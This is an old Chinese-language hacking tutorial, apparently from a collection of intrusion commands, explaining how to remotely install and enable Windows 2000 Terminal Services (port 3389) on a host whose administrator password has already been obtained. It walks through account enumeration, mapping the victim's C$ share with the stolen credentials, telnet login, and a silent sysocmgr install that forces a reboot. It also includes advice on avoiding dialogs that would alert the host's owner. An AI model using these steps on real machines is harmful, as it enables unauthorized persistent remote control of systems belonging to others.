远程开启3389终端服务.txt

常用入侵命令和文章收藏包 介绍了一些常用的 黑客攻击手段

远程开启3389终端服务
http://www.cnwill.com   
 


本文作者： 未知 文章录入：safer
文章出处： angel 
阅读次数： 326
发布日期： 2003-9-29 
远程开启3389终端服务(菜鸟篇) 
得到了一台主机的管理员权限,但我们失望的发现这台主机并没有安装3389终端服务组件, 
是不是有些懊丧呢?别急,下面我们一起来探索一下远程开启3389的方法. 

首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在M$的大部分 
产品中都可运行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等. 
但winnt4中是需要单独购买的,2000专业版不能远程安装终端服务的,至少我没成功过. 
我们在以下的探索中,是以win2000server和高级server为例的.(现在用的也最多). 


现在开始. 

假设我们拿到了一个主机的管理员帐户和密码. 
主机: 192.168.0.1 
帐号: administrator 
密码: 7788 
2000系统安装在c:\winnt下 


从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来 
判断此主机是专业版还是服务器版,才能进入下一个环节. 

我们可以先用对方所开帐户判断: 

c:\>letmein \\192.168.0.1 -all -d 
stating connecting to server ... 
Server local time is: 2002-1-13 10:19:22 
Start get all users FORM server... 
-------------------------- 
Total = 5 
-------------------------- 
num0= Administrator () 
num1= Guest () 
num2= IUSR_servername (Internet 来宾帐号 ) 
num3= IWAM_servername (启动 IIS 进程帐号) 
num4= TsInternetUser (TsInternetUser) 
-------------------------- 
Total = 5 
-------------------------- 

一般情况num2/3/4这三个帐户都是2000server默认开启的. 
2000专业版默认是不开这些帐户的. 

我们也可以扫描对方开放的端口进一步确认: 
用扫描软件如:superscan3.exe扫描对方所开端口 
判断对方是否开启25,3372等2000server默认开启的端口. 

当然我们还可以使用一些工具,如:cmdinfo.zip 
这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一 
系列信息,一个图形界面,一个命令行. 
通过返回的信息就可以很清楚的了解对方主机情况. 

还有一些其他的方法来判断,如:从对方所开的服务来确定等, 
从上面的判断准确率还算高,别的就不一一说明了. 


如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开, 
或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了. 


现在我们要进入下一环节: 
判断终端服务到底有没有安装? 

你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊? 
这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口? 
1.终端服务termservice在"管理工具">>>"服务"中被禁用. 
2.终端服务连接所需的RDP协议在"管理工具">>>"终端服务配置"中被停用连接. 
3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口(图文) 
4.终端服务绑定的网络适配器不是外网的. 
5.防火墙和端口过滤之类的问题. 
6.....(还有我没想到的) 
其实,我们遇到最多的情况就是以上5种情况. 

现在开始判组件是否被安装. 

先与远程主机连接,映射远程主机C盘为本地Z盘 
net use z: \\192.168.0.1\c$ "7788" /user:"administrator" 
命令成功完成。 

然后转到Z盘,检查 
Z:\Documents and Settings\All Users\「开始」菜单\程序\管理工具> 
里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件 
如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小) 
我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实. 

判断完毕,对方好像是没有安装终端服务组件,可以进入下一步: 
telnet登陆对方主机,准备安装服务组件. 

在这里,我强烈建议使用2000自带的telnet服务端登陆, 
有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!) 
就算没有开,打开用完后再关掉就完了. 
.abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详细, 
而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实. 

假如我们已开启对方23端口, 
telnet 192.168.0.1 
输入用户名/密码 
*=============================================================== 
欢迎使用 Microsoft Telnet 服务器。 
*=============================================================== 
C:\> 
\\成功进入!!!! 

进入后,再次检查终端组件是否安装: 
c:\>query user 
这个工具需要安装终端服务. 

这样就进一步确定了组件没有被安装.如果返回: 
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME 
>w1 console 0 运行中 . 2002-1-12 22:5 
\\类似这样的信息,可能组件就已安装. 

好!都清楚了,可以开始安装了. 
--------------------------------------------------- 
C:\>dir c:\sysoc.inf /s //检查INF文件的位置 
c:\WINNT\inf 的目录 

2000-01-10 20:00 3,770 sysoc.inf 
1 个文件 3,770 字节 
----------------------------------------------------- 
C:\> dir c:\sysocmgr.* /s //检查组件安装程序 
c:\WINNT\system32 的目录 

2000-01-10 20:00 42,768 sysocmgr.exe 
1 个文件 42,768 字节 
----------------------------------------------------- 
c:\>echo [Components] > c:\wawa 
c:\>echo TSEnable = on >> c:\wawa 
//这是建立无人参与的安装参数 
c:\>type c:\wawa 
[Components] 
TSEnable = on 
//检查参数文件 
------------------------------------------------------ 
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q 
----------------------------------------------------- 
这一条就是真正安装组件的命令. 
以上这条命令没有加/R参数,主机在安装完后自动重起. 
如若加了/R参数主机就不会重起. 

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时, 
3389终端服务就已经开启.你就可以连上去了. 

问题和建议: 

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方 
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒. 

B 一次不行可以再试一次,在实际中很有作用. 

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼, 
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错，所以会有B的建议.